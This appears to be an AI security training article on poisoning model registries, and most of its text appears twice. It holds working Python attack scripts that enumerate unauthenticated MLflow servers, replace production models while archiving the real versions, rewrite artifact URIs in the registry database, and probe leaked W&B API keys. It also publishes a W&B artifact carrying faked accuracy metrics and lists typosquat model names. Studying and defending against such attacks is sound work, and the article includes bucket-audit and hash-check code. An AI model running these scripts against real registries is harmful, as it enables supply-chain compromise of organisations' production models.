Poisoning Model Registries

advanced12 min readUpdated 2026-03-15

Advanced techniques for attacking model registries like MLflow, Weights & Biases, and Hugging Face Hub, including model replacement attacks, metadata manipulation, artifact poisoning, and supply chain compromise through registry infrastructure.

model-registry mlflow wandb supply-chain poisoning artifact-security

Model registries are the central distribution point for ML models within organizations. Platforms like MLflow, Weights & Biases, and internal registries serve as the authoritative source for which model version runs in production.

Compromising a model registry gives an attacker the ability to replace production models, insert backdoors, and poison the entire downstream consumption chain without touching the training pipeline.

Model Registry Architecture

Common Registry Platforms

Platform	Storage Backend	API Type	Authentication	Typical Deployment
MLflow	S3, GCS, Azure Blob, local FS	REST API	Token-based (often none for OSS)	Self-hosted, Databricks managed
Weights & Biases	W&B cloud, S3	REST + GraphQL	API key	SaaS, self-hosted server
Hugging Face Hub	HF cloud storage	REST API + Git LFS	Token-based	SaaS, on-prem mirror
Vertex AI Model Registry	GCS	gRPC + REST	IAM	GCP managed
SageMaker Model Registry	S3	AWS API	IAM	AWS managed
Custom (internal)	Varies	REST API	Varies	Self-hosted

Attack Surface Map

┌─────────────────────────────────────────────────┐
│              Model Registry                      │
│                                                   │
│  ┌──────────────┐   ┌───────────────────────┐   │
│  │  API Layer    │   │  Web UI / Dashboard    │   │
│  │  (REST/gRPC)  │   │  (metadata browsing)   │   │
│  └──────┬───────┘   └───────────┬───────────┘   │
│         │                        │                │
│  ┌──────┴───────────────────────┴───────────┐   │
│  │         Metadata Store (DB)               │   │
│  │   - Model versions, stages, tags          │   │
│  │   - Run links, metric history             │   │
│  │   - Artifact URIs (pointers to storage)   │   │
│  └──────────────────┬───────────────────────┘   │
│                      │                            │
│  ┌──────────────────┴───────────────────────┐   │
│  │        Artifact Storage Backend           │   │
│  │   - S3 bucket / GCS bucket               │   │
│  │   - Model weights (.pt, .bin, .safetensors)│  │
│  │   - Config files, tokenizers              │   │
│  └───────────────────────────────────────────┘   │
└─────────────────────────────────────────────────┘

MLflow Registry Attacks

Unauthenticated Access

MLflow's open-source tracking server has no authentication by default. Organizations frequently deploy it on internal networks assuming network isolation provides sufficient protection:

import requests
 
def enumerate_mlflow_registry(mlflow_url: str):
    """
    Enumerate an MLflow tracking server for registered models,
    versions, and artifact locations.
    """
    findings = {
        "url": mlflow_url,
        "auth_required": False,
        "models": [],
        "artifact_stores": set(),
    }
 
    # Test unauthenticated access
    try:
        resp = requests.get(
            f"{mlflow_url}/api/2.0/mlflow/registered-models/search",
            params={"max_results": 100},
            timeout=10,
        )
 
        if resp.status_code == 200:
            findings["auth_required"] = False
            models = resp.json().get("registered_models", [])
 
            for model in models:
                model_info = {
                    "name": model["name"],
                    "latest_versions": [],
                    "tags": model.get("tags", []),
                }
 
                for version in model.get("latest_versions", []):
                    artifact_uri = version.get("source", "")
                    model_info["latest_versions"].append({
                        "version": version["version"],
                        "stage": version.get("current_stage", "None"),
                        "source": artifact_uri,
                        "status": version.get("status", ""),
                    })
                    # Extract artifact store location
                    if "s3://" in artifact_uri:
                        bucket = artifact_uri.split("/")[2]
                        findings["artifact_stores"].add(f"s3://{bucket}")
                    elif "gs://" in artifact_uri:
                        bucket = artifact_uri.split("/")[2]
                        findings["artifact_stores"].add(f"gs://{bucket}")
 
                findings["models"].append(model_info)
 
        elif resp.status_code == 401:
            findings["auth_required"] = True
 
    except requests.exceptions.ConnectionError:
        findings["error"] = "Connection failed"
 
    findings["artifact_stores"] = list(findings["artifact_stores"])
    return findings

Model Version Replacement

With write access to the MLflow API, an attacker can replace a production model by creating a new version or modifying the stage assignment:

def replace_production_model(
    mlflow_url: str,
    model_name: str,
    malicious_artifact_path: str,
):
    """
    Replace a production model in MLflow by registering a new version
    and transitioning it to the Production stage.
    """
    import mlflow
    from mlflow.tracking import MlflowClient
 
    mlflow.set_tracking_uri(mlflow_url)
    client = MlflowClient()
 
    # Step 1: Create a new run with the malicious model
    with mlflow.start_run() as run:
        mlflow.log_artifact(malicious_artifact_path)
        run_id = run.info.run_id
        artifact_uri = f"runs:/{run_id}/model"
 
    # Step 2: Register as a new version of the target model
    new_version = client.create_model_version(
        name=model_name,
        source=artifact_uri,
        run_id=run_id,
        description="Performance improvement (automated)",
    )
 
    # Step 3: Transition to Production stage
    client.transition_model_version_stage(
        name=model_name,
        version=new_version.version,
        stage="Production",
        archive_existing_versions=True,  # Archive the legitimate version
    )
 
    return {
        "action": "model_replaced",
        "model": model_name,
        "new_version": new_version.version,
        "old_versions_archived": True,
    }

Artifact URI Manipulation

MLflow stores artifact locations as URIs in its metadata database. Manipulating these URIs redirects model consumers to attacker-controlled artifacts:

def manipulate_artifact_uri(
    mlflow_db_connection: str,
    model_name: str,
    target_version: int,
    malicious_uri: str,
):
    """
    Directly modify the artifact URI in MLflow's metadata database
    to redirect model loading to an attacker-controlled location.
 
    This attack bypasses API-level controls by targeting the database directly.
    Requires database access (common when MLflow uses an unprotected PostgreSQL/MySQL instance).
    """
    import sqlalchemy
 
    engine = sqlalchemy.create_engine(mlflow_db_connection)
 
    with engine.connect() as conn:
        # Update the source URI for the target model version
        conn.execute(
            sqlalchemy.text("""
                UPDATE model_versions
                SET source = :malicious_uri
                WHERE name = :model_name AND version = :version
            """),
            {
                "malicious_uri": malicious_uri,
                "model_name": model_name,
                "version": target_version,
            }
        )
        conn.commit()
 
    return {"action": "artifact_uri_redirected", "new_uri": malicious_uri}

Weights & Biases Attack Surface

API Key Exploitation

W&B API keys provide broad access to an organization's experiment data, model artifacts, and project configurations:

def assess_wandb_access(api_key: str, base_url: str = "https://api.wandb.ai"):
    """
    Assess the scope of access provided by a W&B API key.
    W&B API keys found in code repositories, CI/CD configs,
    or environment variables often have organization-wide access.
    """
    import wandb
 
    findings = []
 
    # Authenticate with the API key
    wandb.login(key=api_key, host=base_url, relogin=True)
    api = wandb.Api()
 
    # Enumerate accessible projects
    try:
        # List all projects the key can access
        runs = api.runs(path="", per_page=5)
        for run in runs:
            findings.append({
                "type": "accessible_run",
                "project": run.project,
                "entity": run.entity,
                "state": run.state,
                "created_at": str(run.created_at),
            })
    except Exception as e:
        findings.append({"error": str(e)})
 
    # Check for artifact access
    try:
        collections = api.artifact_type_collections("model")
        for collection in collections:
            findings.append({
                "type": "model_collection",
                "name": collection.name,
            })
    except Exception:
        pass
 
    return findings

Artifact Poisoning via W&B

def poison_wandb_artifact(
    entity: str,
    project: str,
    artifact_name: str,
    malicious_model_path: str,
):
    """
    Create a new version of a W&B artifact with malicious contents.
    If downstream pipelines use 'latest' or 'best' aliases,
    the poisoned version will be automatically consumed.
    """
    import wandb
 
    run = wandb.init(entity=entity, project=project, job_type="model-upload")
 
    artifact = wandb.Artifact(
        name=artifact_name,
        type="model",
        description="Updated model with performance improvements",
        metadata={"accuracy": 0.99, "f1": 0.98},  # Fake good metrics
    )
    artifact.add_file(malicious_model_path)
    run.log_artifact(artifact, aliases=["latest", "best", "production"])
 
    run.finish()
 
    return {"action": "artifact_poisoned", "artifact": artifact_name}

Hugging Face Hub Attack Vectors

Model Card and README Injection

Hugging Face Hub model cards are rendered as HTML, creating opportunities for social engineering and redirection:

def assess_hf_model_security(model_id: str):
    """
    Assess security characteristics of a Hugging Face Hub model.
    Check for suspicious configurations, unsafe serialization formats,
    and metadata inconsistencies.
    """
    from huggingface_hub import HfApi, model_info
 
    api = HfApi()
    info = api.model_info(model_id, securityStatus=True)
 
    findings = []
 
    # Check serialization format
    files = api.list_repo_files(model_id)
    unsafe_formats = [f for f in files if f.endswith((".pkl", ".pickle", ".bin"))]
    safe_formats = [f for f in files if f.endswith(".safetensors")]
 
    if unsafe_formats and not safe_formats:
        findings.append({
            "severity": "HIGH",
            "finding": "Model uses only unsafe serialization (pickle/bin)",
            "files": unsafe_formats,
            "note": "Pickle files can execute arbitrary code on load",
        })
 
    # Check security scan results
    if hasattr(info, "security_status"):
        findings.append({
            "security_scan": info.security_status,
        })
 
    # Check for suspicious model card content
    try:
        card = api.model_info(model_id).card_data
        if card:
            findings.append({
                "model_card": "present",
                "license": getattr(card, "license", "unknown"),
                "tags": getattr(card, "tags", []),
            })
    except Exception:
        findings.append({"model_card": "missing or unparseable"})
 
    return findings

Typosquatting and Name Confusion

# Common typosquatting patterns for popular models
typosquat_targets = {
    "meta-llama/Llama-3-8B": [
        "meta-Ilama/Llama-3-8B",   # I vs l
        "meta-llama/LLama-3-8B",   # capitalization
        "meta_llama/Llama-3-8B",   # underscore vs hyphen
        "meta-llama/Llama-3-8b",   # case change
        "meta-llama/Llama3-8B",    # missing hyphen
    ],
    "openai/whisper-large-v3": [
        "openai/whisper-large-v4",  # version bump
        "openaI/whisper-large-v3",  # I vs l
        "openai/whisper-Iarge-v3",  # l vs I
    ],
}

Attack Vector	Platform	Difficulty	Detection
Unauthenticated API access	MLflow (OSS)	Low	Network monitoring
Model version replacement	MLflow, W&B	Medium	Version audit logs
Artifact URI manipulation	MLflow (DB access)	Medium	Database audit
API key abuse	W&B, HF Hub	Low (if key found)	API access logs
Typosquatting	HF Hub	Low	Name similarity scanning
Alias hijacking	W&B	Medium	Alias change alerts
Metadata poisoning	All platforms	Low	Metadata validation

Storage Backend Attacks

S3 Bucket Misconfigurations

Model registries frequently store artifacts in cloud storage with overly permissive access policies:

import boto3
from botocore.exceptions import ClientError
 
def assess_model_bucket_security(bucket_name: str):
    """Assess S3 bucket security for a model artifact store."""
    s3 = boto3.client("s3")
    findings = []
 
    # Check bucket ACL
    try:
        acl = s3.get_bucket_acl(Bucket=bucket_name)
        for grant in acl["Grants"]:
            grantee = grant["Grantee"]
            if grantee.get("URI") == "http://acs.amazonaws.com/groups/global/AllUsers":
                findings.append({
                    "severity": "CRITICAL",
                    "finding": "Bucket is publicly accessible",
                    "permission": grant["Permission"],
                })
            elif grantee.get("URI") == "http://acs.amazonaws.com/groups/global/AuthenticatedUsers":
                findings.append({
                    "severity": "HIGH",
                    "finding": "Bucket accessible to all authenticated AWS users",
                    "permission": grant["Permission"],
                })
    except ClientError as e:
        findings.append({"error": f"ACL check failed: {e}"})
 
    # Check for versioning (important for detecting unauthorized modifications)
    try:
        versioning = s3.get_bucket_versioning(Bucket=bucket_name)
        if versioning.get("Status") != "Enabled":
            findings.append({
                "severity": "MEDIUM",
                "finding": "Bucket versioning not enabled",
                "impact": "Cannot detect or recover from unauthorized model replacement",
            })
    except ClientError as e:
        findings.append({"error": f"Versioning check failed: {e}"})
 
    # List model artifacts
    try:
        objects = s3.list_objects_v2(Bucket=bucket_name, MaxKeys=50)
        model_files = [
            obj["Key"] for obj in objects.get("Contents", [])
            if any(obj["Key"].endswith(ext) for ext in
                   [".pt", ".bin", ".safetensors", ".pkl", ".onnx"])
        ]
        findings.append({
            "model_artifacts_found": len(model_files),
            "sample_files": model_files[:10],
        })
    except ClientError as e:
        findings.append({"error": f"List failed: {e}"})
 
    return findings

Registry Integrity Verification

Implementing Model Signing

Organizations should implement cryptographic signing for model artifacts to detect tampering:

import hashlib
import json
 
def verify_model_integrity(
    model_path: str,
    expected_hash: str,
    hash_algorithm: str = "sha256",
) -> dict:
    """
    Verify model artifact integrity against a known-good hash.
    This should be part of every model loading pipeline.
    """
    h = hashlib.new(hash_algorithm)
 
    with open(model_path, "rb") as f:
        while chunk := f.read(8192):
            h.update(chunk)
 
    actual_hash = h.hexdigest()
    matches = actual_hash == expected_hash
 
    return {
        "path": model_path,
        "algorithm": hash_algorithm,
        "expected": expected_hash,
        "actual": actual_hash,
        "integrity_verified": matches,
        "action": "SAFE_TO_LOAD" if matches else "DO_NOT_LOAD",
    }

Model Supply Chain Risks -- broader supply chain attack landscape
Pickle Deserialization Exploits -- exploiting unsafe model serialization
Feature Store Manipulation -- attacking another ML data infrastructure component
ML Pipeline CI/CD Attacks -- attacking the pipeline that feeds registries
Attacking AI Deployments -- what happens after models leave the registry

References

"MLflow Documentation: Model Registry" (2025) - Official MLflow model registry documentation including API reference and stage transitions
"Weights & Biases Model Registry Documentation" (2025) - W&B artifact and model management documentation
"Hugging Face Hub Security" (2025) - Hugging Face's security scanning, safetensors format, and malware detection capabilities
Gu et al., "BadNets: Evaluating Backdooring Attacks on Deep Neural Networks" (2019) - Foundational backdoor attack research relevant to model replacement
MITRE ATLAS, "Poison ML Model" (2023) - Threat framework entries for model poisoning through registry compromise

Knowledge Check

What is the most significant security weakness in default MLflow open-source deployments?

Edit this page on GitHub

Poisoning Model Registries

advanced12 min readUpdated 2026-03-15

model-registry mlflow wandb supply-chain poisoning artifact-security

Compromising a model registry gives an attacker the ability to replace production models, insert backdoors, and poison the entire downstream consumption chain without touching the training pipeline.

Model Registry Architecture

Common Registry Platforms

Platform	Storage Backend	API Type	Authentication	Typical Deployment
MLflow	S3, GCS, Azure Blob, local FS	REST API	Token-based (often none for OSS)	Self-hosted, Databricks managed
Weights & Biases	W&B cloud, S3	REST + GraphQL	API key	SaaS, self-hosted server
Hugging Face Hub	HF cloud storage	REST API + Git LFS	Token-based	SaaS, on-prem mirror
Vertex AI Model Registry	GCS	gRPC + REST	IAM	GCP managed
SageMaker Model Registry	S3	AWS API	IAM	AWS managed
Custom (internal)	Varies	REST API	Varies	Self-hosted

Attack Surface Map

┌─────────────────────────────────────────────────┐
│              Model Registry                      │
│                                                   │
│  ┌──────────────┐   ┌───────────────────────┐   │
│  │  API Layer    │   │  Web UI / Dashboard    │   │
│  │  (REST/gRPC)  │   │  (metadata browsing)   │   │
│  └──────┬───────┘   └───────────┬───────────┘   │
│         │                        │                │
│  ┌──────┴───────────────────────┴───────────┐   │
│  │         Metadata Store (DB)               │   │
│  │   - Model versions, stages, tags          │   │
│  │   - Run links, metric history             │   │
│  │   - Artifact URIs (pointers to storage)   │   │
│  └──────────────────┬───────────────────────┘   │
│                      │                            │
│  ┌──────────────────┴───────────────────────┐   │
│  │        Artifact Storage Backend           │   │
│  │   - S3 bucket / GCS bucket               │   │
│  │   - Model weights (.pt, .bin, .safetensors)│  │
│  │   - Config files, tokenizers              │   │
│  └───────────────────────────────────────────┘   │
└─────────────────────────────────────────────────┘

MLflow Registry Attacks

Unauthenticated Access

MLflow's open-source tracking server has no authentication by default. Organizations frequently deploy it on internal networks assuming network isolation provides sufficient protection:

import requests
 
def enumerate_mlflow_registry(mlflow_url: str):
    """
    Enumerate an MLflow tracking server for registered models,
    versions, and artifact locations.
    """
    findings = {
        "url": mlflow_url,
        "auth_required": False,
        "models": [],
        "artifact_stores": set(),
    }
 
    # Test unauthenticated access
    try:
        resp = requests.get(
            f"{mlflow_url}/api/2.0/mlflow/registered-models/search",
            params={"max_results": 100},
            timeout=10,
        )
 
        if resp.status_code == 200:
            findings["auth_required"] = False
            models = resp.json().get("registered_models", [])
 
            for model in models:
                model_info = {
                    "name": model["name"],
                    "latest_versions": [],
                    "tags": model.get("tags", []),
                }
 
                for version in model.get("latest_versions", []):
                    artifact_uri = version.get("source", "")
                    model_info["latest_versions"].append({
                        "version": version["version"],
                        "stage": version.get("current_stage", "None"),
                        "source": artifact_uri,
                        "status": version.get("status", ""),
                    })
                    # Extract artifact store location
                    if "s3://" in artifact_uri:
                        bucket = artifact_uri.split("/")[2]
                        findings["artifact_stores"].add(f"s3://{bucket}")
                    elif "gs://" in artifact_uri:
                        bucket = artifact_uri.split("/")[2]
                        findings["artifact_stores"].add(f"gs://{bucket}")
 
                findings["models"].append(model_info)
 
        elif resp.status_code == 401:
            findings["auth_required"] = True
 
    except requests.exceptions.ConnectionError:
        findings["error"] = "Connection failed"
 
    findings["artifact_stores"] = list(findings["artifact_stores"])
    return findings

Model Version Replacement

With write access to the MLflow API, an attacker can replace a production model by creating a new version or modifying the stage assignment:

def replace_production_model(
    mlflow_url: str,
    model_name: str,
    malicious_artifact_path: str,
):
    """
    Replace a production model in MLflow by registering a new version
    and transitioning it to the Production stage.
    """
    import mlflow
    from mlflow.tracking import MlflowClient
 
    mlflow.set_tracking_uri(mlflow_url)
    client = MlflowClient()
 
    # Step 1: Create a new run with the malicious model
    with mlflow.start_run() as run:
        mlflow.log_artifact(malicious_artifact_path)
        run_id = run.info.run_id
        artifact_uri = f"runs:/{run_id}/model"
 
    # Step 2: Register as a new version of the target model
    new_version = client.create_model_version(
        name=model_name,
        source=artifact_uri,
        run_id=run_id,
        description="Performance improvement (automated)",
    )
 
    # Step 3: Transition to Production stage
    client.transition_model_version_stage(
        name=model_name,
        version=new_version.version,
        stage="Production",
        archive_existing_versions=True,  # Archive the legitimate version
    )
 
    return {
        "action": "model_replaced",
        "model": model_name,
        "new_version": new_version.version,
        "old_versions_archived": True,
    }

Artifact URI Manipulation

MLflow stores artifact locations as URIs in its metadata database. Manipulating these URIs redirects model consumers to attacker-controlled artifacts:

def manipulate_artifact_uri(
    mlflow_db_connection: str,
    model_name: str,
    target_version: int,
    malicious_uri: str,
):
    """
    Directly modify the artifact URI in MLflow's metadata database
    to redirect model loading to an attacker-controlled location.
 
    This attack bypasses API-level controls by targeting the database directly.
    Requires database access (common when MLflow uses an unprotected PostgreSQL/MySQL instance).
    """
    import sqlalchemy
 
    engine = sqlalchemy.create_engine(mlflow_db_connection)
 
    with engine.connect() as conn:
        # Update the source URI for the target model version
        conn.execute(
            sqlalchemy.text("""
                UPDATE model_versions
                SET source = :malicious_uri
                WHERE name = :model_name AND version = :version
            """),
            {
                "malicious_uri": malicious_uri,
                "model_name": model_name,
                "version": target_version,
            }
        )
        conn.commit()
 
    return {"action": "artifact_uri_redirected", "new_uri": malicious_uri}

Weights & Biases Attack Surface

API Key Exploitation

W&B API keys provide broad access to an organization's experiment data, model artifacts, and project configurations:

def assess_wandb_access(api_key: str, base_url: str = "https://api.wandb.ai"):
    """
    Assess the scope of access provided by a W&B API key.
    W&B API keys found in code repositories, CI/CD configs,
    or environment variables often have organization-wide access.
    """
    import wandb
 
    findings = []
 
    # Authenticate with the API key
    wandb.login(key=api_key, host=base_url, relogin=True)
    api = wandb.Api()
 
    # Enumerate accessible projects
    try:
        # List all projects the key can access
        runs = api.runs(path="", per_page=5)
        for run in runs:
            findings.append({
                "type": "accessible_run",
                "project": run.project,
                "entity": run.entity,
                "state": run.state,
                "created_at": str(run.created_at),
            })
    except Exception as e:
        findings.append({"error": str(e)})
 
    # Check for artifact access
    try:
        collections = api.artifact_type_collections("model")
        for collection in collections:
            findings.append({
                "type": "model_collection",
                "name": collection.name,
            })
    except Exception:
        pass
 
    return findings

Artifact Poisoning via W&B

def poison_wandb_artifact(
    entity: str,
    project: str,
    artifact_name: str,
    malicious_model_path: str,
):
    """
    Create a new version of a W&B artifact with malicious contents.
    If downstream pipelines use 'latest' or 'best' aliases,
    the poisoned version will be automatically consumed.
    """
    import wandb
 
    run = wandb.init(entity=entity, project=project, job_type="model-upload")
 
    artifact = wandb.Artifact(
        name=artifact_name,
        type="model",
        description="Updated model with performance improvements",
        metadata={"accuracy": 0.99, "f1": 0.98},  # Fake good metrics
    )
    artifact.add_file(malicious_model_path)
    run.log_artifact(artifact, aliases=["latest", "best", "production"])
 
    run.finish()
 
    return {"action": "artifact_poisoned", "artifact": artifact_name}

Hugging Face Hub Attack Vectors

Model Card and README Injection

Hugging Face Hub model cards are rendered as HTML, creating opportunities for social engineering and redirection:

def assess_hf_model_security(model_id: str):
    """
    Assess security characteristics of a Hugging Face Hub model.
    Check for suspicious configurations, unsafe serialization formats,
    and metadata inconsistencies.
    """
    from huggingface_hub import HfApi, model_info
 
    api = HfApi()
    info = api.model_info(model_id, securityStatus=True)
 
    findings = []
 
    # Check serialization format
    files = api.list_repo_files(model_id)
    unsafe_formats = [f for f in files if f.endswith((".pkl", ".pickle", ".bin"))]
    safe_formats = [f for f in files if f.endswith(".safetensors")]
 
    if unsafe_formats and not safe_formats:
        findings.append({
            "severity": "HIGH",
            "finding": "Model uses only unsafe serialization (pickle/bin)",
            "files": unsafe_formats,
            "note": "Pickle files can execute arbitrary code on load",
        })
 
    # Check security scan results
    if hasattr(info, "security_status"):
        findings.append({
            "security_scan": info.security_status,
        })
 
    # Check for suspicious model card content
    try:
        card = api.model_info(model_id).card_data
        if card:
            findings.append({
                "model_card": "present",
                "license": getattr(card, "license", "unknown"),
                "tags": getattr(card, "tags", []),
            })
    except Exception:
        findings.append({"model_card": "missing or unparseable"})
 
    return findings

Typosquatting and Name Confusion

# Common typosquatting patterns for popular models
typosquat_targets = {
    "meta-llama/Llama-3-8B": [
        "meta-Ilama/Llama-3-8B",   # I vs l
        "meta-llama/LLama-3-8B",   # capitalization
        "meta_llama/Llama-3-8B",   # underscore vs hyphen
        "meta-llama/Llama-3-8b",   # case change
        "meta-llama/Llama3-8B",    # missing hyphen
    ],
    "openai/whisper-large-v3": [
        "openai/whisper-large-v4",  # version bump
        "openaI/whisper-large-v3",  # I vs l
        "openai/whisper-Iarge-v3",  # l vs I
    ],
}

Attack Vector	Platform	Difficulty	Detection
Unauthenticated API access	MLflow (OSS)	Low	Network monitoring
Model version replacement	MLflow, W&B	Medium	Version audit logs
Artifact URI manipulation	MLflow (DB access)	Medium	Database audit
API key abuse	W&B, HF Hub	Low (if key found)	API access logs
Typosquatting	HF Hub	Low	Name similarity scanning
Alias hijacking	W&B	Medium	Alias change alerts
Metadata poisoning	All platforms	Low	Metadata validation

Storage Backend Attacks

S3 Bucket Misconfigurations

Model registries frequently store artifacts in cloud storage with overly permissive access policies:

import boto3
from botocore.exceptions import ClientError
 
def assess_model_bucket_security(bucket_name: str):
    """Assess S3 bucket security for a model artifact store."""
    s3 = boto3.client("s3")
    findings = []
 
    # Check bucket ACL
    try:
        acl = s3.get_bucket_acl(Bucket=bucket_name)
        for grant in acl["Grants"]:
            grantee = grant["Grantee"]
            if grantee.get("URI") == "http://acs.amazonaws.com/groups/global/AllUsers":
                findings.append({
                    "severity": "CRITICAL",
                    "finding": "Bucket is publicly accessible",
                    "permission": grant["Permission"],
                })
            elif grantee.get("URI") == "http://acs.amazonaws.com/groups/global/AuthenticatedUsers":
                findings.append({
                    "severity": "HIGH",
                    "finding": "Bucket accessible to all authenticated AWS users",
                    "permission": grant["Permission"],
                })
    except ClientError as e:
        findings.append({"error": f"ACL check failed: {e}"})
 
    # Check for versioning (important for detecting unauthorized modifications)
    try:
        versioning = s3.get_bucket_versioning(Bucket=bucket_name)
        if versioning.get("Status") != "Enabled":
            findings.append({
                "severity": "MEDIUM",
                "finding": "Bucket versioning not enabled",
                "impact": "Cannot detect or recover from unauthorized model replacement",
            })
    except ClientError as e:
        findings.append({"error": f"Versioning check failed: {e}"})
 
    # List model artifacts
    try:
        objects = s3.list_objects_v2(Bucket=bucket_name, MaxKeys=50)
        model_files = [
            obj["Key"] for obj in objects.get("Contents", [])
            if any(obj["Key"].endswith(ext) for ext in
                   [".pt", ".bin", ".safetensors", ".pkl", ".onnx"])
        ]
        findings.append({
            "model_artifacts_found": len(model_files),
            "sample_files": model_files[:10],
        })
    except ClientError as e:
        findings.append({"error": f"List failed: {e}"})
 
    return findings

Registry Integrity Verification

Implementing Model Signing

Organizations should implement cryptographic signing for model artifacts to detect tampering:

import hashlib
import json
 
def verify_model_integrity(
    model_path: str,
    expected_hash: str,
    hash_algorithm: str = "sha256",
) -> dict:
    """
    Verify model artifact integrity against a known-good hash.
    This should be part of every model loading pipeline.
    """
    h = hashlib.new(hash_algorithm)
 
    with open(model_path, "rb") as f:
        while chunk := f.read(8192):
            h.update(chunk)
 
    actual_hash = h.hexdigest()
    matches = actual_hash == expected_hash
 
    return {
        "path": model_path,
        "algorithm": hash_algorithm,
        "expected": expected_hash,
        "actual": actual_hash,
        "integrity_verified": matches,
        "action": "SAFE_TO_LOAD" if matches else "DO_NOT_LOAD",
    }

Model Supply Chain Risks -- broader supply chain attack landscape
Pickle Deserialization Exploits -- exploiting unsafe model serialization
Feature Store Manipulation -- attacking another ML data infrastructure component
ML Pipeline CI/CD Attacks -- attacking the pipeline that feeds registries
Attacking AI Deployments -- what happens after models leave the registry

References

"MLflow Documentation: Model Registry" (2025) - Official MLflow model registry documentation including API reference and stage transitions
"Weights & Biases Model Registry Documentation" (2025) - W&B artifact and model management documentation
"Hugging Face Hub Security" (2025) - Hugging Face's security scanning, safetensors format, and malware detection capabilities
Gu et al., "BadNets: Evaluating Backdooring Attacks on Deep Neural Networks" (2019) - Foundational backdoor attack research relevant to model replacement
MITRE ATLAS, "Poison ML Model" (2023) - Threat framework entries for model poisoning through registry compromise

Knowledge Check

What is the most significant security weakness in default MLflow open-source deployments?

Edit this page on GitHub

Poisoning Model Registries

Related articles

Poisoning Model Registries

Related articles